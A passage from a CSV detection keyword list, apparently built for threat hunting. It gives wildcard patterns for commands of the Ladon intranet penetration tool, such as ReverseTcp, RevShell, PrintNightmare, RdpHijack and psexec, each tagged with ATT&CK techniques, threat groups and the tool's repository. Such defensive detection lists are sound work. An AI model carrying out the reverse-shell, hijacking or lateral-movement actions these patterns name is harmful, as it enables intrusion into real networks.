loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon GetPipe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon GetSystem*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon IISdoor*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon IISpwd*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon MssqlCmd *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon netsh *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon noping *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon Open3389*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon PowerCat *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon PrintNightmare*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon psexec*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon QueryAdmin*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon RdpHijack*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon ReadFile *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon RegAuto*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon ReverseHttps*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon ReverseTcp *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon RevShell-*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon Runas*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon RunPS *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
